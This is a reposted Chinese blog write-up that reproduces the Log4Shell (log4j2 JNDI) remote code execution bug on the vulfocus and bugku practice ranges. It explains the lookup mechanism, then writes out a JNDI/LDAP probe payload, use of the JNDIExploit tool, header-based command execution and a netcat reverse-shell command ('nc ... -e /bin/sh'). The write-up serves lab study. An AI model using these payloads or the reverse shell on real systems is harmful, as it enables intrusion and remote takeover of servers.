IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> Java知识库 -> log4j2-rce 靶场复现 -> 正文阅读

[Java知识库]log4j2-rce 靶场复现

log4j2是前几天一个核弹级的漏洞

现在公开的靶场有vulfocus、bugku
http://vulfocus.fofa.so/#/dashboard
https://ctf.bugku.com/challenges/detail/id/340.html

关于该漏洞原理有很多大佬写了, 久不做赘述。简单来说
日志打印时遇到了${, 如果里面包含内容会当成变量来替换被执行
${Jndi Lookup方法:key://
Interpolator 类按照 : 分割出第一部分作为 prefix, 第二部分作为 key
通过 prefix 去找对应的 lookup,再通过对应的 lookup 实例调用 lookup 方法传入 key 作为参数此次漏洞存在 JndiLookup 实例。JndiLookup 则是直接把传进来的 key 当做 JNDI URL 用 InitialContext.lookup 去访问,从而造成了 JNDI 代码执行漏洞
在这里插入图片描述

在该核弹payload被公开的第二天, 在微信转发payload时微信直接把${}给拦截掉了, 开始还以为我没有copy全, 在第二次尝试时候才反应过来, 直到第三天才恢复

在这里插入图片描述

工具使用的是https://github.com/welk1n/JNDI-Injection-Exploit

先使用log4shell了解一下

环境启动

docker run --name vulnerable-app -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app

curl一下
在这里插入图片描述
可以看见可以将字符串嵌入到服务器记录的请求字段中
在这里插入图片描述
尝试写入
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

在docker中查看发现可以被写入

在这里插入图片描述

工具的使用

JNDIExploit是 一款用于 JNDI注入 利用的工具
利用该工具开启能够执行恶意命令的 ldap 服务器
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 本地IP -p httpPort

在这里插入图片描述

在这里插入图片描述

靶场复现

vulfocus

官网与本地搭建的环境不同, 官网的header缺少Content-Type: application/x-www-form-urlencoded

描述中有提示, 抓包显示的头部缺少Content-Type: application/x-www-form-urlencoded
在这里插入图片描述
在这里插入图片描述

使用payload验证, 发现可以触发dnslog, 可以确认可以利用
payload=${jndi:ldap://xxx.dnslog.cn/}
在这里插入图片描述
开启工具, 工具开启在外网能被靶机访问到
在这里插入图片描述
构造payload

在这里插入图片描述
/TomcatBypass/TomcatEcho命令执行结果回显
在header头部加入cmd: 命令
执行回显
在这里插入图片描述

Getshell

使用ReverseShell 该模块用于 Linux 系统的反弹shell
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

也可以使用/TomcatBypass/Command/Base64/模块, 发现构造中代码缺少, 再进行url编码两次

在这里插入图片描述
发现识别成功, payload成功构建
在这里插入图片描述
在这里插入图片描述

bugku

在这里插入图片描述

一样是构造payload发现可以触发
在这里插入图片描述
但是在题目上有提示, 反弹shell的构造方式不一样
在这里插入图片描述
发现不能直接连接, 那就按照他的写法吧, 因为没有说环境什么的久使用默认的吧
在这里插入图片描述

nc一直在报错, 明明payload和nc格式都没问题, 然后发现是nc少了一个命令少了一个
应该是nc -lnvvp
payload: nc 连接IP 12312 -e /bin/sh
在这里插入图片描述

而且针对该漏洞的bypass有很多种, 以及各种利用

比如获取java版本等等
而且ldap注入工具对jdk高于8u191不能用basic
在这里插入图片描述
在这里插入图片描述

阿… 不能这样子用

在这里插入图片描述
当然不光这里可以, 还有其他的地方可以写入payload

比如

robots.txt
email
username
password
header
file
ssl certificates .........

关注公众号

请添加图片描述

  Java知识库 最新文章
计算距离春节还有多长时间
系统开发系列 之WebService(spring框架+ma
springBoot+Cache(自定义有效时间配置)
SpringBoot整合mybatis实现增删改查、分页查
spring教程
SpringBoot+Vue实现美食交流网站的设计与实
虚拟机内存结构以及虚拟机中销毁和新建对象
SpringMVC---原理
小李同学: Java如何按多个字段分组
打印票据--java
上一篇文章      下一篇文章      查看所有文章
加:2021-12-16 17:32:20  更:2021-12-16 17:33:23 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/24 7:07:16-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码